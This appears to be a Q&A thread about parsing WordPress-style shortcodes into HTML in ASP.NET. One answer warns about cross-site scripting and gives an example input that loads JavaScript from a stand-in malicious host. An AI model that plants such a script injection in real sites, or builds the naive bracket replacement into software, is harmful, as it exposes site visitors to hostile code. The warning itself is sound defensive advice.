I want to filter my text to a particular format. Suppose i have a text like

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, [iframe width="200" height="300"][/iframe]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s,

Which i want to convert like :

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, < iframe width="200" height="300"></iframe >Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s,

Ex2 : [caption]My Caption[/caption] will show <span class="caption">My Caption</span>

link|improve this question
2  
is there a reason you don't want to use an existing formatting language? Like Markdown, or BBCode – Jim Deville Nov 19 '11 at 0:00
Wooooooooooooooow, I spent days writing an answer to a totally different question. Please format your questions correctly!! – Shredder Nov 19 '11 at 1:48
didn't you understand my question i want to use this text paring like wordpress short code in asp.net – arifur rahman Nov 19 '11 at 14:15
feedback

2 Answers

You'd need to parse your content and replace pre-defined "combinations" with html equivalent.

Also you'd need to be very carefull if you accept content from members since you'll be directly changing the html code with the replacement.

link|improve this answer
feedback

James Deville has a very good question - likely the best solution is to use a text markup system that has been already put together (markdown, etc.).

But if you decide you do need to do this in a custom way (assuming there will be user input):

Just make sure to NOT use anything like s/\[/</ and s/\]/>/. This will leave you wide open to vulnerabilities.

Someone could enter

[script type="text/javascript" src="http://malicious-server.haxx/XSS.js"]

which would be translated into

<script type="text/javascript" src="http://malicious-server.haxx/XSS.js">

Then anyone viewing that fragment of text would also be requesting that malicious javascript unintentionally.

Summary: If you do this wrong you can introduce serious security vulnerabilities into your site. So use an already-implemented system if at all possible. Otherwise be very selective about what tags you accept.

link|improve this answer
i want this to parse in asp.net not javascript – arifur rahman Nov 19 '11 at 14:13
I think you need to read my answer more carefully. It had nothing to do with parsing using javascript. – Nick Knowlson Nov 20 '11 at 22:20
it will not parge all the text in to attribute i will parge only the method which i mention – arifur rahman Apr 21 at 17:45
feedback

Your Answer

 
or
required, but never shown

Not the answer you're looking for? Browse other questions tagged or ask your own question.